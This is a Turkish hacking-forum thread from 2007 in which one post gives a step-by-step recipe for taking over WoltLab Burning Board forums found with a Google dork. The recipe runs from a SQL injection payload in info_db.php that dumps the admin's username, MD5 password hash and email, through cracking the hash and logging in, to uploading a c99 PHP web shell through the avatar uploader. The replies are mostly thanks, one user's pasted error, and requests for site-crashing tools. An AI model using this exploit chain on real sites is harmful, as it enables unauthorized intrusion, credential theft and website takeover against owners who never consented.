PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: harika bir açık site hacklemeyen kalmasın diye :)


SoN-KraL
04-22-2007, 01:45 PM
Google'den inurl:info_db.php aratalım.

önümüze bir sürü site gelecek.Biz bunlardan herhangi birini seçioruz.

Sonra sıra info_db.php olan kısımla aşagıda ki kodu değiştiriyoruz...


Alıntı:
info_db.php?action=file&subkat id=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0, 0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
örnek

Alıntı:
örneksite.com/wbb2/info_db.php
bunu şöle yapıoruz


Alıntı:
örneksite.com/wbb2/info_d...re/**/userid=1
Not: 'No exploit' derse açık kaptılmıştır

Userid=1 Genelde Admindir
Userid=2,3,4 Diğer yetkililer olabilir.

Buna göre Userid=1 Bırakıp deneyin Karşınızda md5 gelecektir.
Adminmi değilmi ise mailinde gözükür sql injek mailide alacak şekilde ayarlı,adminin maili site uzantılıdır genellikle.

Admin Md5'inide aldık sıra geldi bunu kırmaya.
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

Bu adresten ekliyeceksiniz Md5'inizi kırmasını bekliyeceksiniz.

Size birşey diyeyim; 10 tane md5 verdiysem 7'sini kırdı emin olun hemde çok kısa bir zamanda kırmaz demeyin direk ekleyin arkadaşlar.

Sonra Md5'ide kırdık,admin kullanıcı adı ve şifresi ile login olunuz.

Daha sonra Admin CP adlı menüden(genelde üstte olur) admin paneline gidiniz.Bulamassanız site/acp'den girebilirsiniz.

Bu panel dili değişik olduğu için karışık genellikle.Buradan Avatar adı geçen aşağılara doğru bir menü vardır.Nasıl derseniz 3-4 tane Avatar XXX die menüler vardır alt alta bunların 1 veya 2.sine tıklayın GÖZAT butonu görükecektir.
Oradan istediğiniz php dosyasınızı seçip önerilen c99 servera atınız.Siz attıktan sonra upload edilenleri gösteren bir bölüme yönlendirecek.Ordan dosyasını bulun,adreside yazar ordan girin.

Upload ettiğim dosya nerede?

Sizin paneliniz şu; site.com/forum/acp
Site ise avatarı site.com/forum/images/avatars/avatarx-.php şeklinde atar oradan bakıcaksınız.
C99:

rossimy
04-22-2007, 02:15 PM
saol sadrazam senin paylaşımların diğer arkdaşlardan iyi çok tşk

ReeKer.100
04-22-2007, 02:57 PM
bu yöntem çok eski işe yaramaz

PacMaN
04-22-2007, 02:59 PM
paylasım ıcın saol kardes

robin1
04-22-2007, 03:06 PM
hadi şu siteyi çökert bakalım Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

Nicomedian
04-22-2007, 03:09 PM
100 kere yayınlandı

fat1h92
04-22-2007, 03:11 PM
hadi şu siteyi çökert bakalım Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

kardeş aynı şeyi yazıp durma be:mad:

alper_16fb
04-22-2007, 03:11 PM
sadrazam kardeş emeğine sağlık

hqk31
04-22-2007, 03:13 PM
eyw ama biraz eski

kanaryaozgur38
04-22-2007, 03:18 PM
sadrazam bu siteyi çözemedim Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. burdan nereye giripte Md5 i yazacaz yardımcı olursan sevinirim.

@ntis@pık
04-22-2007, 04:57 PM
emeğe saygı

CeyPoweR
04-22-2007, 04:59 PM
sadrazam bu siteyi çözemedim Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. burdan nereye giripte Md5 i yazacaz yardımcı olursan sevinirim.

cevap:
kardeş üsteki menüde cracker var oraya tıkla

dj_murat!!
04-23-2007, 05:57 PM
slm
slm
slm
slm
arkadaşlar nasılsınz ben site cökerme pırogramı arıyorum yardım adebiirmisniz

körkuyu
04-23-2007, 06:07 PM
sasol kardeş

gemlikli_ceza
04-23-2007, 06:19 PM
arkadaşlar bende yapıcam heralde deniyorum teşekkürler ama bende md5 i kırmayı bilmiyorum lütfen yardım

gemlikli_ceza
04-23-2007, 06:25 PM
yaa arkadaşlar hep böyle şey çıkıyo yaa

SQL-DATABASE ERROR

Database error in WoltLab Burning Board (2.3.6): Invalid SQL: SELECT * FROM bb2_info_db_data WHERE db_d_id=-1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0, 0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
mysql error: Table 'd002573e.bb1_users' doesn't exist
mysql error number: 1146
mysql version: 4.0.23-Max-log
php version: 4.4.2
Date: 23.04.2007 @ 17:24
Script: /info_db.php?action=file&subkat%20id=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,%200,0,email,0,0,0,0 ,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
Referer:

S@Ü@R@G@Ü@N
04-23-2007, 06:26 PM
sadrazam eline sağlık abiiiii***********

_artis.artis_
04-23-2007, 06:48 PM
Eskİ Bu Artik (:

ozya_03
04-23-2007, 06:52 PM
saol paylaşımın için

Flex
04-23-2007, 06:55 PM
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

çözemien arkdaşım burdan direk ulaşabilirsin

ama md5 kırmak md5 almaktan daha zor be

PiDe
04-23-2007, 06:56 PM
tebrikler güzel paylaşımm

adil00
04-23-2007, 07:00 PM
Ya saçmalamayın 5 kişi 10 kişi onları hackledi eee diğerleri ne yapacak?

Namesiz
04-23-2007, 07:09 PM
saol sadrazam güzel paylaşım eline sağlık

TurkisHacker
04-23-2007, 08:31 PM
saol Sadrazam kardes yeni baslayanlara cok yardimci oluuyosun bu arada emege saygi

Hacked_By_diE
04-23-2007, 08:35 PM
paylaşım güzel sadrazam çok thanks

Hacked_By_diE
04-23-2007, 08:36 PM
100 kere yayınlandı

sende heryerde bunu diyosun be kardeşim yayınlandıysa kanıtla adamların emeğine saygısızlık etme emeğe saygı duyun biraz :mad:

Dietime
04-24-2007, 12:30 PM
abi yarısı exploit dior yaw :D

melissa---angel
04-24-2007, 02:09 PM
yapamadımmm:(

hondahon
04-24-2007, 03:44 PM
gsl çok gsl bilginle bizi aydınlattığın içn tşşkürler

kuresel_16
04-24-2007, 03:50 PM
saol...

Dogukan8806
04-24-2007, 04:06 PM
Tşk Ler...

insannn
04-28-2007, 04:16 PM
sadrazama güvenmeyen bizden diildir sadrazam abim beni tanır beyaz cocuk ben SaDRaZaM_T€am türk hacker arkandayız abi özellikle beN

ExxuuS
04-28-2007, 04:19 PM
güsel paylaşımlar... ellerine saglık...

j3m
04-29-2007, 07:48 PM
arkadşalar kaç kere yayınlandığını sayamadığım açıkları verip kirlilik yapıyorsunuz... konuya kilit lütfen!!

Vasili81
04-29-2007, 07:59 PM
teşekkurler verildi ama en açık anlatılışı burda.teşekkurler sadrazam

coolrapper-07
05-11-2007, 01:40 PM
no expolit diyo